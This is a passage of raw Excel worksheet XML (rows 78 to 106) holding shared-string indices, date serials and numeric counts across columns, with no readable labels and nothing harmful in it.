      </c>
      <c r="J78" t="s">
        <v>76</v>
      </c>
      <c r="K78" t="s">
        <v>575</v>
      </c>
      <c r="L78" t="s">
        <v>77</v>
      </c>
      <c r="M78" t="s">
        <v>76</v>
      </c>
      <c r="O78" t="s">
        <v>1205</v>
      </c>
      <c r="Q78" t="s">
        <v>3519</v>
      </c>
      <c r="R78">
        <v>15066</v>
      </c>
      <c r="S78">
        <v>13811</v>
      </c>
      <c r="T78">
        <v>12793</v>
      </c>
      <c r="U78">
        <v>12984</v>
      </c>
      <c r="V78">
        <v>13372</v>
      </c>
      <c r="W78" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="79" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A79" t="s">
        <v>4</v>
      </c>
      <c r="B79">
        <v>44341.743694837962</v>
      </c>
      <c r="C79" t="s">
        <v>1192</v>
      </c>
      <c r="D79">
        <v>120</v>
      </c>
      <c r="E79" t="s">
        <v>1206</v>
      </c>
      <c r="F79">
        <v>100</v>
      </c>
      <c r="G79" t="s">
        <v>1207</v>
      </c>
      <c r="H79" t="s">
        <v>1074</v>
      </c>
      <c r="I79" t="s">
        <v>75</v>
      </c>
      <c r="J79" t="s">
        <v>76</v>
      </c>
      <c r="K79" t="s">
        <v>575</v>
      </c>
      <c r="L79" t="s">
        <v>77</v>
      </c>
      <c r="M79" t="s">
        <v>76</v>
      </c>
      <c r="O79" t="s">
        <v>1208</v>
      </c>
      <c r="Q79" t="s">
        <v>3519</v>
      </c>
      <c r="R79">
        <v>15062</v>
      </c>
      <c r="S79">
        <v>13823</v>
      </c>
      <c r="T79">
        <v>12776</v>
      </c>
      <c r="U79">
        <v>12982</v>
      </c>
      <c r="V79">
        <v>13376</v>
      </c>
      <c r="W79" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="80" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A80" t="s">
        <v>4</v>
      </c>
      <c r="B80">
        <v>44405.670701736111</v>
      </c>
      <c r="C80" t="s">
        <v>1192</v>
      </c>
      <c r="D80">
        <v>120</v>
      </c>
      <c r="E80" t="s">
        <v>1214</v>
      </c>
      <c r="F80">
        <v>120</v>
      </c>
      <c r="G80" t="s">
        <v>1215</v>
      </c>
      <c r="H80" t="s">
        <v>1074</v>
      </c>
      <c r="I80" t="s">
        <v>75</v>
      </c>
      <c r="J80" t="s">
        <v>454</v>
      </c>
      <c r="K80" t="s">
        <v>575</v>
      </c>
      <c r="L80" t="s">
        <v>77</v>
      </c>
      <c r="Q80" t="s">
        <v>3519</v>
      </c>
      <c r="R80">
        <v>15066</v>
      </c>
      <c r="S80">
        <v>13821</v>
      </c>
      <c r="T80">
        <v>12769</v>
      </c>
      <c r="U80">
        <v>12984</v>
      </c>
      <c r="V80">
        <v>13338</v>
      </c>
      <c r="W80" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="81" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A81" t="s">
        <v>4</v>
      </c>
      <c r="B81">
        <v>44663.366533622684</v>
      </c>
      <c r="C81" t="s">
        <v>1220</v>
      </c>
      <c r="D81">
        <v>100</v>
      </c>
      <c r="E81" t="s">
        <v>1221</v>
      </c>
      <c r="F81">
        <v>100</v>
      </c>
      <c r="G81" t="s">
        <v>1222</v>
      </c>
      <c r="H81" t="s">
        <v>1223</v>
      </c>
      <c r="I81" t="s">
        <v>75</v>
      </c>
      <c r="J81" t="s">
        <v>454</v>
      </c>
      <c r="K81" t="s">
        <v>575</v>
      </c>
      <c r="L81" t="s">
        <v>77</v>
      </c>
      <c r="M81" t="s">
        <v>76</v>
      </c>
      <c r="Q81" t="s">
        <v>1224</v>
      </c>
      <c r="S81">
        <v>6</v>
      </c>
      <c r="W81" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="82" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A82" t="s">
        <v>4</v>
      </c>
      <c r="B82">
        <v>44265.584430173614</v>
      </c>
      <c r="C82" t="s">
        <v>1225</v>
      </c>
      <c r="D82">
        <v>203</v>
      </c>
      <c r="E82" t="s">
        <v>1226</v>
      </c>
      <c r="F82">
        <v>203</v>
      </c>
      <c r="G82" t="s">
        <v>1227</v>
      </c>
      <c r="H82" t="s">
        <v>1228</v>
      </c>
      <c r="I82" t="s">
        <v>103</v>
      </c>
      <c r="J82" t="s">
        <v>147</v>
      </c>
      <c r="K82" t="s">
        <v>35</v>
      </c>
      <c r="L82" t="s">
        <v>83</v>
      </c>
      <c r="M82" t="s">
        <v>148</v>
      </c>
      <c r="N82" t="s">
        <v>149</v>
      </c>
      <c r="O82" t="s">
        <v>1229</v>
      </c>
      <c r="Q82" t="s">
        <v>3520</v>
      </c>
      <c r="R82">
        <v>639145</v>
      </c>
      <c r="S82">
        <v>506982</v>
      </c>
      <c r="T82">
        <v>486266</v>
      </c>
      <c r="U82">
        <v>561137</v>
      </c>
      <c r="V82">
        <v>689546</v>
      </c>
      <c r="W82" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="83" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A83" t="s">
        <v>4</v>
      </c>
      <c r="B83">
        <v>44445.617869374997</v>
      </c>
      <c r="C83" t="s">
        <v>1237</v>
      </c>
      <c r="D83">
        <v>101</v>
      </c>
      <c r="E83" t="s">
        <v>1232</v>
      </c>
      <c r="F83">
        <v>101</v>
      </c>
      <c r="G83" t="s">
        <v>1233</v>
      </c>
      <c r="H83" t="s">
        <v>1234</v>
      </c>
      <c r="I83" t="s">
        <v>172</v>
      </c>
      <c r="J83" t="s">
        <v>1238</v>
      </c>
      <c r="K83" t="s">
        <v>13</v>
      </c>
      <c r="L83" t="s">
        <v>83</v>
      </c>
      <c r="M83" t="s">
        <v>72</v>
      </c>
      <c r="N83" t="s">
        <v>174</v>
      </c>
      <c r="O83" t="s">
        <v>1235</v>
      </c>
      <c r="Q83" t="s">
        <v>3521</v>
      </c>
      <c r="U83">
        <v>2</v>
      </c>
      <c r="V83">
        <v>2</v>
      </c>
      <c r="W83" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="84" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A84" t="s">
        <v>4</v>
      </c>
      <c r="B84">
        <v>44312.455104699075</v>
      </c>
      <c r="C84" t="s">
        <v>1246</v>
      </c>
      <c r="D84">
        <v>113</v>
      </c>
      <c r="E84" t="s">
        <v>1247</v>
      </c>
      <c r="F84">
        <v>113</v>
      </c>
      <c r="G84" t="s">
        <v>1248</v>
      </c>
      <c r="H84" t="s">
        <v>89</v>
      </c>
      <c r="I84" t="s">
        <v>75</v>
      </c>
      <c r="J84" t="s">
        <v>76</v>
      </c>
      <c r="K84" t="s">
        <v>15</v>
      </c>
      <c r="L84" t="s">
        <v>77</v>
      </c>
      <c r="M84" t="s">
        <v>90</v>
      </c>
      <c r="N84" t="s">
        <v>91</v>
      </c>
      <c r="Q84" t="s">
        <v>3522</v>
      </c>
      <c r="R84">
        <v>93076</v>
      </c>
      <c r="S84">
        <v>154858</v>
      </c>
      <c r="T84">
        <v>42180102</v>
      </c>
      <c r="U84">
        <v>41278649</v>
      </c>
      <c r="V84">
        <v>50537375</v>
      </c>
      <c r="W84" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="85" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A85" t="s">
        <v>4</v>
      </c>
      <c r="B85">
        <v>44312.455104687499</v>
      </c>
      <c r="C85" t="s">
        <v>1246</v>
      </c>
      <c r="D85">
        <v>113</v>
      </c>
      <c r="E85" t="s">
        <v>1250</v>
      </c>
      <c r="F85">
        <v>113</v>
      </c>
      <c r="G85" t="s">
        <v>1251</v>
      </c>
      <c r="H85" t="s">
        <v>110</v>
      </c>
      <c r="I85" t="s">
        <v>75</v>
      </c>
      <c r="J85" t="s">
        <v>76</v>
      </c>
      <c r="K85" t="s">
        <v>15</v>
      </c>
      <c r="L85" t="s">
        <v>77</v>
      </c>
      <c r="M85" t="s">
        <v>90</v>
      </c>
      <c r="N85" t="s">
        <v>91</v>
      </c>
      <c r="Q85" t="s">
        <v>3522</v>
      </c>
      <c r="R85">
        <v>2692855</v>
      </c>
      <c r="S85">
        <v>2555186</v>
      </c>
      <c r="T85">
        <v>2555180</v>
      </c>
      <c r="U85">
        <v>2680531</v>
      </c>
      <c r="V85">
        <v>3143115</v>
      </c>
      <c r="W85" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="86" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A86" t="s">
        <v>4</v>
      </c>
      <c r="B86">
        <v>44504.458599166668</v>
      </c>
      <c r="C86" t="s">
        <v>1252</v>
      </c>
      <c r="D86">
        <v>110</v>
      </c>
      <c r="E86" t="s">
        <v>1253</v>
      </c>
      <c r="F86">
        <v>110</v>
      </c>
      <c r="G86" t="s">
        <v>1254</v>
      </c>
      <c r="H86" t="s">
        <v>1255</v>
      </c>
      <c r="I86" t="s">
        <v>172</v>
      </c>
      <c r="J86" t="s">
        <v>173</v>
      </c>
      <c r="K86" t="s">
        <v>13</v>
      </c>
      <c r="L86" t="s">
        <v>77</v>
      </c>
      <c r="M86" t="s">
        <v>1256</v>
      </c>
      <c r="N86" t="s">
        <v>1257</v>
      </c>
      <c r="Q86" t="s">
        <v>1258</v>
      </c>
      <c r="W86" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="87" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A87" t="s">
        <v>4</v>
      </c>
      <c r="B87">
        <v>44434.635436087963</v>
      </c>
      <c r="C87" t="s">
        <v>1259</v>
      </c>
      <c r="D87">
        <v>100</v>
      </c>
      <c r="E87" t="s">
        <v>1260</v>
      </c>
      <c r="F87">
        <v>100</v>
      </c>
      <c r="G87" t="s">
        <v>1261</v>
      </c>
      <c r="H87" t="s">
        <v>1262</v>
      </c>
      <c r="I87" t="s">
        <v>172</v>
      </c>
      <c r="J87" t="s">
        <v>173</v>
      </c>
      <c r="K87" t="s">
        <v>13</v>
      </c>
      <c r="L87" t="s">
        <v>77</v>
      </c>
      <c r="M87" t="s">
        <v>1256</v>
      </c>
      <c r="N87" t="s">
        <v>1257</v>
      </c>
      <c r="Q87" t="s">
        <v>1258</v>
      </c>
      <c r="W87" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="88" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A88" t="s">
        <v>4</v>
      </c>
      <c r="B88">
        <v>44474.396612256947</v>
      </c>
      <c r="C88" t="s">
        <v>1263</v>
      </c>
      <c r="D88">
        <v>101</v>
      </c>
      <c r="E88" t="s">
        <v>1264</v>
      </c>
      <c r="F88">
        <v>101</v>
      </c>
      <c r="G88" t="s">
        <v>1265</v>
      </c>
      <c r="H88" t="s">
        <v>1266</v>
      </c>
      <c r="I88" t="s">
        <v>172</v>
      </c>
      <c r="J88" t="s">
        <v>173</v>
      </c>
      <c r="K88" t="s">
        <v>13</v>
      </c>
      <c r="L88" t="s">
        <v>77</v>
      </c>
      <c r="M88" t="s">
        <v>1256</v>
      </c>
      <c r="N88" t="s">
        <v>1257</v>
      </c>
      <c r="Q88" t="s">
        <v>1258</v>
      </c>
      <c r="W88" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="89" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A89" t="s">
        <v>4</v>
      </c>
      <c r="B89">
        <v>44434.619034537034</v>
      </c>
      <c r="C89" t="s">
        <v>1267</v>
      </c>
      <c r="D89">
        <v>100</v>
      </c>
      <c r="E89" t="s">
        <v>1268</v>
      </c>
      <c r="F89">
        <v>100</v>
      </c>
      <c r="G89" t="s">
        <v>1269</v>
      </c>
      <c r="H89" t="s">
        <v>1270</v>
      </c>
      <c r="I89" t="s">
        <v>172</v>
      </c>
      <c r="J89" t="s">
        <v>173</v>
      </c>
      <c r="K89" t="s">
        <v>13</v>
      </c>
      <c r="L89" t="s">
        <v>77</v>
      </c>
      <c r="M89" t="s">
        <v>1256</v>
      </c>
      <c r="N89" t="s">
        <v>1257</v>
      </c>
      <c r="Q89" t="s">
        <v>1258</v>
      </c>
      <c r="W89" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="90" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A90" t="s">
        <v>4</v>
      </c>
      <c r="B90">
        <v>44445.61456603009</v>
      </c>
      <c r="C90" t="s">
        <v>1263</v>
      </c>
      <c r="D90">
        <v>101</v>
      </c>
      <c r="E90" t="s">
        <v>1271</v>
      </c>
      <c r="F90">
        <v>100</v>
      </c>
      <c r="G90" t="s">
        <v>1272</v>
      </c>
      <c r="H90" t="s">
        <v>1273</v>
      </c>
      <c r="I90" t="s">
        <v>172</v>
      </c>
      <c r="J90" t="s">
        <v>173</v>
      </c>
      <c r="K90" t="s">
        <v>13</v>
      </c>
      <c r="L90" t="s">
        <v>77</v>
      </c>
      <c r="M90" t="s">
        <v>1256</v>
      </c>
      <c r="N90" t="s">
        <v>1257</v>
      </c>
      <c r="Q90" t="s">
        <v>1258</v>
      </c>
      <c r="W90" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="91" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A91" t="s">
        <v>4</v>
      </c>
      <c r="B91">
        <v>44434.635436111108</v>
      </c>
      <c r="C91" t="s">
        <v>1259</v>
      </c>
      <c r="D91">
        <v>100</v>
      </c>
      <c r="E91" t="s">
        <v>1274</v>
      </c>
      <c r="F91">
        <v>100</v>
      </c>
      <c r="G91" t="s">
        <v>1275</v>
      </c>
      <c r="H91" t="s">
        <v>1276</v>
      </c>
      <c r="I91" t="s">
        <v>172</v>
      </c>
      <c r="J91" t="s">
        <v>173</v>
      </c>
      <c r="K91" t="s">
        <v>13</v>
      </c>
      <c r="L91" t="s">
        <v>77</v>
      </c>
      <c r="M91" t="s">
        <v>1256</v>
      </c>
      <c r="N91" t="s">
        <v>1257</v>
      </c>
      <c r="Q91" t="s">
        <v>1258</v>
      </c>
      <c r="W91" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="92" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A92" t="s">
        <v>4</v>
      </c>
      <c r="B92">
        <v>44504.458599155092</v>
      </c>
      <c r="C92" t="s">
        <v>1252</v>
      </c>
      <c r="D92">
        <v>110</v>
      </c>
      <c r="E92" t="s">
        <v>1277</v>
      </c>
      <c r="F92">
        <v>110</v>
      </c>
      <c r="G92" t="s">
        <v>1278</v>
      </c>
      <c r="H92" t="s">
        <v>1279</v>
      </c>
      <c r="I92" t="s">
        <v>172</v>
      </c>
      <c r="J92" t="s">
        <v>173</v>
      </c>
      <c r="K92" t="s">
        <v>13</v>
      </c>
      <c r="L92" t="s">
        <v>77</v>
      </c>
      <c r="M92" t="s">
        <v>1256</v>
      </c>
      <c r="N92" t="s">
        <v>1257</v>
      </c>
      <c r="Q92" t="s">
        <v>1258</v>
      </c>
      <c r="T92">
        <v>1</v>
      </c>
      <c r="W92" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="93" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A93" t="s">
        <v>4</v>
      </c>
      <c r="B93">
        <v>44504.458599178244</v>
      </c>
      <c r="C93" t="s">
        <v>1252</v>
      </c>
      <c r="D93">
        <v>110</v>
      </c>
      <c r="E93" t="s">
        <v>1280</v>
      </c>
      <c r="F93">
        <v>110</v>
      </c>
      <c r="G93" t="s">
        <v>1281</v>
      </c>
      <c r="H93" t="s">
        <v>1282</v>
      </c>
      <c r="I93" t="s">
        <v>172</v>
      </c>
      <c r="J93" t="s">
        <v>173</v>
      </c>
      <c r="K93" t="s">
        <v>13</v>
      </c>
      <c r="L93" t="s">
        <v>77</v>
      </c>
      <c r="M93" t="s">
        <v>1256</v>
      </c>
      <c r="N93" t="s">
        <v>1257</v>
      </c>
      <c r="Q93" t="s">
        <v>1258</v>
      </c>
      <c r="W93" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="94" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A94" t="s">
        <v>4</v>
      </c>
      <c r="B94">
        <v>44434.61903454861</v>
      </c>
      <c r="C94" t="s">
        <v>1267</v>
      </c>
      <c r="D94">
        <v>100</v>
      </c>
      <c r="E94" t="s">
        <v>1283</v>
      </c>
      <c r="F94">
        <v>100</v>
      </c>
      <c r="G94" t="s">
        <v>1284</v>
      </c>
      <c r="H94" t="s">
        <v>1285</v>
      </c>
      <c r="I94" t="s">
        <v>172</v>
      </c>
      <c r="J94" t="s">
        <v>173</v>
      </c>
      <c r="K94" t="s">
        <v>13</v>
      </c>
      <c r="L94" t="s">
        <v>77</v>
      </c>
      <c r="M94" t="s">
        <v>1256</v>
      </c>
      <c r="N94" t="s">
        <v>1257</v>
      </c>
      <c r="Q94" t="s">
        <v>1258</v>
      </c>
      <c r="W94" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="95" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A95" t="s">
        <v>4</v>
      </c>
      <c r="B95">
        <v>44016.919070185184</v>
      </c>
      <c r="C95" t="s">
        <v>1286</v>
      </c>
      <c r="D95">
        <v>104</v>
      </c>
      <c r="E95" t="s">
        <v>1287</v>
      </c>
      <c r="F95">
        <v>102</v>
      </c>
      <c r="G95" t="s">
        <v>1288</v>
      </c>
      <c r="H95" t="s">
        <v>1289</v>
      </c>
      <c r="I95" t="s">
        <v>268</v>
      </c>
      <c r="J95" t="s">
        <v>269</v>
      </c>
      <c r="K95" t="s">
        <v>10</v>
      </c>
      <c r="L95" t="s">
        <v>77</v>
      </c>
      <c r="M95" t="s">
        <v>270</v>
      </c>
      <c r="N95" t="s">
        <v>271</v>
      </c>
      <c r="O95" t="s">
        <v>1290</v>
      </c>
      <c r="P95" t="s">
        <v>272</v>
      </c>
      <c r="Q95" t="s">
        <v>3523</v>
      </c>
      <c r="R95">
        <v>94742</v>
      </c>
      <c r="S95">
        <v>103735</v>
      </c>
      <c r="T95">
        <v>96125</v>
      </c>
      <c r="U95">
        <v>105138</v>
      </c>
      <c r="V95">
        <v>120505</v>
      </c>
      <c r="W95" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="96" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A96" t="s">
        <v>4</v>
      </c>
      <c r="B96">
        <v>44081.616353287034</v>
      </c>
      <c r="C96" t="s">
        <v>1286</v>
      </c>
      <c r="D96">
        <v>101</v>
      </c>
      <c r="E96" t="s">
        <v>1287</v>
      </c>
      <c r="F96">
        <v>101</v>
      </c>
      <c r="G96" t="s">
        <v>1288</v>
      </c>
      <c r="H96" t="s">
        <v>1289</v>
      </c>
      <c r="I96" t="s">
        <v>268</v>
      </c>
      <c r="J96" t="s">
        <v>269</v>
      </c>
      <c r="K96" t="s">
        <v>10</v>
      </c>
      <c r="L96" t="s">
        <v>77</v>
      </c>
      <c r="M96" t="s">
        <v>270</v>
      </c>
      <c r="N96" t="s">
        <v>271</v>
      </c>
      <c r="Q96" t="s">
        <v>1292</v>
      </c>
      <c r="R96">
        <v>94742</v>
      </c>
      <c r="S96">
        <v>103735</v>
      </c>
      <c r="T96">
        <v>96125</v>
      </c>
      <c r="U96">
        <v>105138</v>
      </c>
      <c r="V96">
        <v>120505</v>
      </c>
      <c r="W96" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="97" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A97" t="s">
        <v>4</v>
      </c>
      <c r="B97">
        <v>44252.698165682872</v>
      </c>
      <c r="C97" t="s">
        <v>1286</v>
      </c>
      <c r="D97">
        <v>200</v>
      </c>
      <c r="E97" t="s">
        <v>1293</v>
      </c>
      <c r="F97">
        <v>200</v>
      </c>
      <c r="G97" t="s">
        <v>1288</v>
      </c>
      <c r="H97" t="s">
        <v>1289</v>
      </c>
      <c r="I97" t="s">
        <v>268</v>
      </c>
      <c r="J97" t="s">
        <v>269</v>
      </c>
      <c r="K97" t="s">
        <v>10</v>
      </c>
      <c r="L97" t="s">
        <v>77</v>
      </c>
      <c r="M97" t="s">
        <v>270</v>
      </c>
      <c r="N97" t="s">
        <v>271</v>
      </c>
      <c r="Q97" t="s">
        <v>3524</v>
      </c>
      <c r="R97">
        <v>94742</v>
      </c>
      <c r="S97">
        <v>103735</v>
      </c>
      <c r="T97">
        <v>96125</v>
      </c>
      <c r="U97">
        <v>105138</v>
      </c>
      <c r="V97">
        <v>120505</v>
      </c>
      <c r="W97" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="98" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A98" t="s">
        <v>4</v>
      </c>
      <c r="B98">
        <v>44169.134548020833</v>
      </c>
      <c r="C98" t="s">
        <v>1286</v>
      </c>
      <c r="D98">
        <v>104</v>
      </c>
      <c r="E98" t="s">
        <v>1296</v>
      </c>
      <c r="F98">
        <v>100</v>
      </c>
      <c r="G98" t="s">
        <v>1297</v>
      </c>
      <c r="H98" t="s">
        <v>1298</v>
      </c>
      <c r="I98" t="s">
        <v>268</v>
      </c>
      <c r="J98" t="s">
        <v>269</v>
      </c>
      <c r="K98" t="s">
        <v>10</v>
      </c>
      <c r="L98" t="s">
        <v>77</v>
      </c>
      <c r="M98" t="s">
        <v>270</v>
      </c>
      <c r="N98" t="s">
        <v>271</v>
      </c>
      <c r="Q98" t="s">
        <v>3523</v>
      </c>
      <c r="R98">
        <v>19</v>
      </c>
      <c r="S98">
        <v>2</v>
      </c>
      <c r="T98">
        <v>3</v>
      </c>
      <c r="U98">
        <v>1973</v>
      </c>
      <c r="V98">
        <v>20228</v>
      </c>
      <c r="W98" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="99" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A99" t="s">
        <v>4</v>
      </c>
      <c r="B99">
        <v>44252.698165706017</v>
      </c>
      <c r="C99" t="s">
        <v>1286</v>
      </c>
      <c r="D99">
        <v>200</v>
      </c>
      <c r="E99" t="s">
        <v>1296</v>
      </c>
      <c r="F99">
        <v>101</v>
      </c>
      <c r="G99" t="s">
        <v>1297</v>
      </c>
      <c r="H99" t="s">
        <v>1298</v>
      </c>
      <c r="I99" t="s">
        <v>268</v>
      </c>
      <c r="J99" t="s">
        <v>269</v>
      </c>
      <c r="K99" t="s">
        <v>10</v>
      </c>
      <c r="L99" t="s">
        <v>77</v>
      </c>
      <c r="M99" t="s">
        <v>270</v>
      </c>
      <c r="N99" t="s">
        <v>271</v>
      </c>
      <c r="O99" t="s">
        <v>111</v>
      </c>
      <c r="Q99" t="s">
        <v>3524</v>
      </c>
      <c r="R99">
        <v>19</v>
      </c>
      <c r="S99">
        <v>2</v>
      </c>
      <c r="T99">
        <v>3</v>
      </c>
      <c r="U99">
        <v>1973</v>
      </c>
      <c r="V99">
        <v>20228</v>
      </c>
      <c r="W99" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="100" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A100" t="s">
        <v>4</v>
      </c>
      <c r="B100">
        <v>44057.72132099537</v>
      </c>
      <c r="C100" t="s">
        <v>1286</v>
      </c>
      <c r="D100">
        <v>104</v>
      </c>
      <c r="E100" t="s">
        <v>1299</v>
      </c>
      <c r="F100">
        <v>100</v>
      </c>
      <c r="G100" t="s">
        <v>1300</v>
      </c>
      <c r="H100" t="s">
        <v>1301</v>
      </c>
      <c r="I100" t="s">
        <v>268</v>
      </c>
      <c r="J100" t="s">
        <v>269</v>
      </c>
      <c r="K100" t="s">
        <v>10</v>
      </c>
      <c r="L100" t="s">
        <v>77</v>
      </c>
      <c r="M100" t="s">
        <v>270</v>
      </c>
      <c r="N100" t="s">
        <v>271</v>
      </c>
      <c r="Q100" t="s">
        <v>3523</v>
      </c>
      <c r="W100" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="101" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A101" t="s">
        <v>4</v>
      </c>
      <c r="B101">
        <v>44252.698165694441</v>
      </c>
      <c r="C101" t="s">
        <v>1286</v>
      </c>
      <c r="D101">
        <v>200</v>
      </c>
      <c r="E101" t="s">
        <v>1302</v>
      </c>
      <c r="F101">
        <v>200</v>
      </c>
      <c r="G101" t="s">
        <v>1303</v>
      </c>
      <c r="H101" t="s">
        <v>1301</v>
      </c>
      <c r="I101" t="s">
        <v>268</v>
      </c>
      <c r="J101" t="s">
        <v>269</v>
      </c>
      <c r="K101" t="s">
        <v>10</v>
      </c>
      <c r="L101" t="s">
        <v>77</v>
      </c>
      <c r="M101" t="s">
        <v>270</v>
      </c>
      <c r="N101" t="s">
        <v>271</v>
      </c>
      <c r="Q101" t="s">
        <v>3524</v>
      </c>
      <c r="W101" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="102" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A102" t="s">
        <v>4</v>
      </c>
      <c r="B102">
        <v>44087.123192928244</v>
      </c>
      <c r="C102" t="s">
        <v>1304</v>
      </c>
      <c r="D102">
        <v>101</v>
      </c>
      <c r="E102" t="s">
        <v>1305</v>
      </c>
      <c r="F102">
        <v>100</v>
      </c>
      <c r="G102" t="s">
        <v>1306</v>
      </c>
      <c r="H102" t="s">
        <v>1307</v>
      </c>
      <c r="I102" t="s">
        <v>268</v>
      </c>
      <c r="J102" t="s">
        <v>566</v>
      </c>
      <c r="K102" t="s">
        <v>12</v>
      </c>
      <c r="L102" t="s">
        <v>77</v>
      </c>
      <c r="M102" t="s">
        <v>622</v>
      </c>
      <c r="N102" t="s">
        <v>623</v>
      </c>
      <c r="Q102" t="s">
        <v>1308</v>
      </c>
      <c r="U102">
        <v>8</v>
      </c>
      <c r="W102" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="103" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A103" t="s">
        <v>4</v>
      </c>
      <c r="B103">
        <v>44489.668331828703</v>
      </c>
      <c r="C103" t="s">
        <v>1304</v>
      </c>
      <c r="D103">
        <v>204</v>
      </c>
      <c r="E103" t="s">
        <v>1305</v>
      </c>
      <c r="F103">
        <v>203</v>
      </c>
      <c r="G103" t="s">
        <v>1306</v>
      </c>
      <c r="H103" t="s">
        <v>1309</v>
      </c>
      <c r="I103" t="s">
        <v>268</v>
      </c>
      <c r="J103" t="s">
        <v>566</v>
      </c>
      <c r="K103" t="s">
        <v>12</v>
      </c>
      <c r="L103" t="s">
        <v>77</v>
      </c>
      <c r="M103" t="s">
        <v>622</v>
      </c>
      <c r="N103" t="s">
        <v>623</v>
      </c>
      <c r="Q103" t="s">
        <v>3525</v>
      </c>
      <c r="U103">
        <v>8</v>
      </c>
      <c r="W103" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="104" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A104" t="s">
        <v>4</v>
      </c>
      <c r="B104">
        <v>44489.668331886576</v>
      </c>
      <c r="C104" t="s">
        <v>1304</v>
      </c>
      <c r="D104">
        <v>204</v>
      </c>
      <c r="E104" t="s">
        <v>1311</v>
      </c>
      <c r="F104">
        <v>101</v>
      </c>
      <c r="G104" t="s">
        <v>1312</v>
      </c>
      <c r="H104" t="s">
        <v>1313</v>
      </c>
      <c r="I104" t="s">
        <v>268</v>
      </c>
      <c r="J104" t="s">
        <v>566</v>
      </c>
      <c r="K104" t="s">
        <v>12</v>
      </c>
      <c r="L104" t="s">
        <v>77</v>
      </c>
      <c r="M104" t="s">
        <v>622</v>
      </c>
      <c r="N104" t="s">
        <v>623</v>
      </c>
      <c r="O104" t="s">
        <v>111</v>
      </c>
      <c r="Q104" t="s">
        <v>3525</v>
      </c>
      <c r="R104">
        <v>735</v>
      </c>
      <c r="S104">
        <v>889</v>
      </c>
      <c r="T104">
        <v>1025</v>
      </c>
      <c r="U104">
        <v>1096</v>
      </c>
      <c r="V104">
        <v>1003</v>
      </c>
      <c r="W104" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="105" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A105" t="s">
        <v>4</v>
      </c>
      <c r="B105">
        <v>44522.394452928238</v>
      </c>
      <c r="C105" t="s">
        <v>1304</v>
      </c>
      <c r="D105">
        <v>204</v>
      </c>
      <c r="E105" t="s">
        <v>1314</v>
      </c>
      <c r="F105">
        <v>102</v>
      </c>
      <c r="G105" t="s">
        <v>1315</v>
      </c>
      <c r="H105" t="s">
        <v>1316</v>
      </c>
      <c r="I105" t="s">
        <v>268</v>
      </c>
      <c r="J105" t="s">
        <v>566</v>
      </c>
      <c r="K105" t="s">
        <v>12</v>
      </c>
      <c r="L105" t="s">
        <v>77</v>
      </c>
      <c r="M105" t="s">
        <v>622</v>
      </c>
      <c r="N105" t="s">
        <v>623</v>
      </c>
      <c r="Q105" t="s">
        <v>3525</v>
      </c>
      <c r="W105" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="106" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A106" t="s">
        <v>4</v>
      </c>
      <c r="B106">
        <v>44128.941194305553</v>
      </c>
      <c r="C106" t="s">
        <v>1304</v>
      </c>
      <c r="D106">
        <v>101</v>
      </c>
      <c r="E106" t="s">
        <v>1317</v>
      </c>
      <c r="F106">
        <v>101</v>
      </c>
      <c r="G106" t="s">
        <v>1318</v>
      </c>
      <c r="H106" t="s">
        <v>1319</v>
      </c>
      <c r="I106" t="s">
        <v>268</v>
      </c>
      <c r="J106" t="s">
        <v>566</v>
      </c>
      <c r="K106" t="s">
        <v>40</v>
      </c>
      <c r="L106" t="s">
        <v>83</v>
      </c>
      <c r="N106" t="s">
        <v>1320</v>
      </c>
      <c r="Q106" t="s">
        <v>1308</v>
      </c>
      <c r="R106">
        <v>495</v>
      </c>
      <c r="S106">
        <v>68</v>
      </c>
      <c r="T106">
        <v>89</v>
      </c>
      <c r="U106">
        <v>1482</v>
      </c>
